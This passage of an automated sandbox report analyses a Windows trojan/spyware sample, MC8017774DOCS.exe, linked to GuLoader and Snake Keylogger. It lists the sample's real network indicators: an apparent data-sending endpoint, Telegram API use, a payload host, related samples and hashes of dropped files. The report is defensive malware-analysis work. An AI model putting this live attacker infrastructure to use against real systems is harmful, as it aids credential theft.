                                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedMC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://reallyfreegeoip.org/xml/MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                          		high

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          132.226.8.169
                                                                                                          		checkip.dyndns.comUnited States
                                                                                                          		16989UTMEMUSfalse
                                                                                                          149.154.167.220
                                                                                                          		api.telegram.orgUnited Kingdom
                                                                                                          		62041TELEGRAMRUfalse
                                                                                                          185.244.144.68
                                                                                                          		mertvinc.com.trTurkey
                                                                                                          		199608BIRBIRTRfalse
                                                                                                          5.182.211.149
                                                                                                          		the.drillmmcsnk.topNetherlands
                                                                                                          		64425SKB-ENTERPRISENLfalse
                                                                                                          172.67.177.134
                                                                                                          		reallyfreegeoip.orgUnited States
                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                          General Information

                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1562048
                                                                                                          Start date and time:2024-11-25 07:08:08 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 8m 45s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:5
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:MC8017774DOCS.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/5@5/5
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 89%
                                                                                                          • Number of executed functions: 45
                                                                                                          • Number of non-executed functions: 34
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          01:09:56API Interceptor32344x Sleep call for process: MC8017774DOCS.exe modified

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          132.226.8.169Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          01831899-1 FDMS3008SDC.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          149.154.167.220Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                DESIGN LOGO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    WV7Gj9lJ7W.exeGet hashmaliciousXWormBrowse
                                                                                                                      18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                                                                        SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                            sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              185.244.144.68Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • mertvinc.com.tr/oxzGOftLtQcGlWZ214.bin
                                                                                                                              New listed items 7648767856387547354734567465647568487.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                                                                              • mertvinc.com.tr/TPwPATw126.bin
                                                                                                                              yVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin
                                                                                                                              WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                              • mertvinc.com.tr/fRzMqN204.bin
                                                                                                                              MG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
                                                                                                                              CL714440147.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
                                                                                                                              TKnBbCiX07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
                                                                                                                              Snurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • mertvinc.com.tr/fYJJzdXnGgCBdwfMZh209.bin
                                                                                                                              Eksistensberettigelsernes102.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • mertvinc.com.tr/fYJJzdXnGgCBdwfMZh209.bin
                                                                                                                              7000091945.xlsx.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                              • mertvinc.com.tr/OGDTCbBRybqnXF193.bin

                                                                                                                              Domains

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              mertvinc.com.trShave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              New listed items 7648767856387547354734567465647568487.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              yVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              MG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              CL714440147.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              api.telegram.orgShave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              DESIGN LOGO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              WV7Gj9lJ7W.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              checkip.dyndns.comShave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 193.122.130.0
                                                                                                                              New shipment AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                              • 132.226.247.73
                                                                                                                              rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                              • 132.226.247.73
                                                                                                                              PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              • 132.226.247.73
                                                                                                                              S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 132.226.247.73
                                                                                                                              ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 193.122.6.168
                                                                                                                              Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              • 132.226.8.169
                                                                                                                              PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                              • 132.226.8.169
                                                                                                                              sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              • 132.226.8.169
                                                                                                                              rrequestforquotation.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                              • 193.122.6.168
                                                                                                                              reallyfreegeoip.orgShave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 172.67.177.134
                                                                                                                              New shipment AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                              • 172.67.177.134
                                                                                                                              rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                              • 104.21.67.152
                                                                                                                              PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              • 104.21.67.152
                                                                                                                              S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 104.21.67.152
                                                                                                                              ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 104.21.67.152
                                                                                                                              Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              • 104.21.67.152
                                                                                                                              PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                              • 104.21.67.152
                                                                                                                              sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              • 172.67.177.134
                                                                                                                              rrequestforquotation.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                              • 172.67.177.134

                                                                                                                              ASNs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              BIRBIRTRShave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              New listed items 7648767856387547354734567465647568487.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              yVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              MG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              CL714440147.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              • 185.244.144.68
                                                                                                                              TELEGRAMRUShave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              DESIGN LOGO.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              WV7Gj9lJ7W.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              21Installer.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                              • 149.154.167.99
                                                                                                                              SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              UTMEMUSNew shipment AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                              • 132.226.247.73
                                                                                                                              rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                              • 132.226.247.73
                                                                                                                              PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              • 132.226.247.73
                                                                                                                              S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 132.226.247.73
                                                                                                                              Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              • 132.226.8.169
                                                                                                                              mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                              • 132.226.51.241
                                                                                                                              sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                              • 128.169.54.96
                                                                                                                              PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                              • 132.226.8.169
                                                                                                                              http://mweb.webhop.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 132.226.118.109
                                                                                                                              sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              • 132.226.8.169
                                                                                                                              SKB-ENTERPRISENLbot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.148.121.112
                                                                                                                              bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.148.121.112
                                                                                                                              i3LQkjkqOB.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                              • 45.148.121.112
                                                                                                                              grjD7lWffX.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                              • 45.148.121.112
                                                                                                                              systemd-udevd (deleted)Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.148.120.142
                                                                                                                              systemd-udevd (deleted)Get hashmaliciousUnknownBrowse
                                                                                                                              • 45.148.120.142
                                                                                                                              configs.confGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.148.120.142
                                                                                                                              configs.confGet hashmaliciousUnknownBrowse
                                                                                                                              • 45.148.120.142
                                                                                                                              Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
                                                                                                                              • 45.148.122.66
                                                                                                                              Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
                                                                                                                              • 45.148.122.66

                                                                                                                              JA3 Fingerprints

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adPigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 172.67.177.134
                                                                                                                              Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 172.67.177.134
                                                                                                                              New shipment AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                              • 172.67.177.134
                                                                                                                              rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                              • 172.67.177.134
                                                                                                                              PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              • 172.67.177.134
                                                                                                                              S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 172.67.177.134
                                                                                                                              ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 172.67.177.134
                                                                                                                              Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              • 172.67.177.134
                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                              • 172.67.177.134
                                                                                                                              https://docs.google.com/drawings/d/15fSe2159qP21C2NrS3K5cgcsyPwNINvux6xIUCvvgBU/preview?pli=1AmyVazquez-brian.nester@lvhn.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 172.67.177.134
                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0ePigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              202411_257658#U00b7pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              0Nj1sxmCtr.exeGet hashmaliciousBinder HackTool, QuasarBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              FW EBS - Goods for M-PROJECTS - PROFORMA - PAYMENT - SWIFT - DELIVERY ORDER NO. INM303.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              FW EBS - Goods for M-PROJECTS - PROFORMA - PAYMENT - SWIFT - DELIVERY ORDER NO. INM303.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 149.154.167.220
                                                                                                                              PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              • 149.154.167.220

                                                                                                                              Dropped Files

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dllPigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    Readouts.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      New listed items 7648767856387547354734567465647568487.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                                                                                        yVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                          PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                            S50MC-C_3170262-7.6cylinder_liner.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\Sipunculoidea.ude

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-12, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 649037107316853453566312041152512.000000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):286686
                                                                                                                                                  Entropy (8bit):1.2536158727628404
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:3zbnVKpXfwz53wppkaub35azZSECekyln9KUXjJrv5YQ1ujVNDYb3ezsIhWCUiSL:KH4hI9iE3sLB9pXYzlkOYFWf9
                                                                                                                                                  MD5:99A5E2E2953D0374F1E23FF8B0B6773F
                                                                                                                                                  SHA1:5FC3F9C3638DD60012AB2F2ECDD016912BBDB9F3
                                                                                                                                                  SHA-256:3D1233CB89AD10CCC6972697279A3741F6031E05D32738E9B34D37A230C0F84A
                                                                                                                                                  SHA-512:1B002C12EAB187B0246483C5F3B0758DC84BCC884E1120A17B0412DFD349972DB5DA04E154AE21D405BA33BBD0C29AADFA7D1BF4D50347146D6DFCCBBD8DA94A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:.........................................|.........................F........................................................S..............................S.................................................................8....;........................^........................)......"..Y........B................d......................}.........i......................................9.....................................R...............]............................................................I.........u..................................j.....^.....................................................................W..................................................................................m......................................*.....................>..........O........[................................................B............................}..../...............................[.......?.............................Z..#.........................4...............................

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\Torturkammerets.Nik

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):472868
                                                                                                                                                  Entropy (8bit):6.917253204664265
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:oOotBmbqGe04Asl7ACPHaycaSErvJSciCc/tBfa:oOBbTF4Ac7VaBapvwVVI
                                                                                                                                                  MD5:1603919560ECC0C67267F4D26AE182E8
                                                                                                                                                  SHA1:A0A4AE2FEDCB69A48822619E38E35BB243AB4307
                                                                                                                                                  SHA-256:9DE7EFD6B560857516E450DB3D6B99FCD528CE84081CC24C0D25EE07DB04825B
                                                                                                                                                  SHA-512:5BBA9408A51734E5F9E3F03E4553CDF7AD617675C1494D24366F7C4989D08FB879EA2D8EE6392196385AF7D75090DB36807D2633E5AC72F33FC382D84EF75A3A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\moccasins.ved

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):73531
                                                                                                                                                  Entropy (8bit):1.2569404898190384
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:dVICOgr5CpPXeGASSCorJvHtPvpwqcQ+5pPZg71l4oLuZK52Oc410+RaL7VomsEa:dVcPX7U1R9mPZgx1hn32+emD40rd
                                                                                                                                                  MD5:22148562A5A87FF1BECCAE5E77D87142
                                                                                                                                                  SHA1:D1B04F09ACFC146855AA02A8C530AA8A45DF3F24
                                                                                                                                                  SHA-256:B09EF713D0920E9671DA35332C6DAE7C1E12BE409A7077D6CA3E07938F9C08E9
                                                                                                                                                  SHA-512:3F96B2ABED75C8EA941E45BB3835EF4D5FC92C5C5F829A738641FD398D88BB838E7C22A0F5F998BF387A5CE4ADC77EECAA049BCFB1A9ADD476871C871D58E811
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:......................................................................................x..........................|........................................l...................a.........................................U.....................k..........................................G..................................................................|.....b....................O...R..........n...................&.....................l..................!.......6......... ......S.......................................}........................................7..................................................................................................................................................B......#......b....................60........?.....z.......>..........................:..............%..l...........g...........................=D.....{.....................................&........................{.......................i..........................................5.]............

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\sporostrote.dip

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):220203
                                                                                                                                                  Entropy (8bit):1.262001836842358
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:EBCX3JLNVpAeI+EgywY0Szqqv3ib1RuU7thllrhAKF3+O1jaJgMH8JHuHR6qTSIT:EkLjwqF1z1MoqyH
                                                                                                                                                  MD5:F8A828CA56113806A25802FF2AF74282
                                                                                                                                                  SHA1:B016C4258BD1F9A19989E0C6B7AB993ED02DF96F
                                                                                                                                                  SHA-256:95941451FFB946693877FBD721001ACC32FE70D75EA68CAB1756B3ADF77DCFF4
                                                                                                                                                  SHA-512:6725AA09040FAC962CCFF2EF9897FB6F3F3706FE60D8C55A69CB9E0C21362B3C8C186C573D647C0A50438686D6035361A4A20138C451E641D507BD1218D1E079
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:...................................................@......................................................................<....................................................O....../..........T.....................................i................................................................,.......................t.....................t.................................{!...................................................................................................X..........s.............@.............C....2................................-..............................w..............................................................H....................I........."..................C.................a................p...6.......................'......................................................................................%.............................x.................Q...................................z..........................i....hv...x.................`..........c.

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
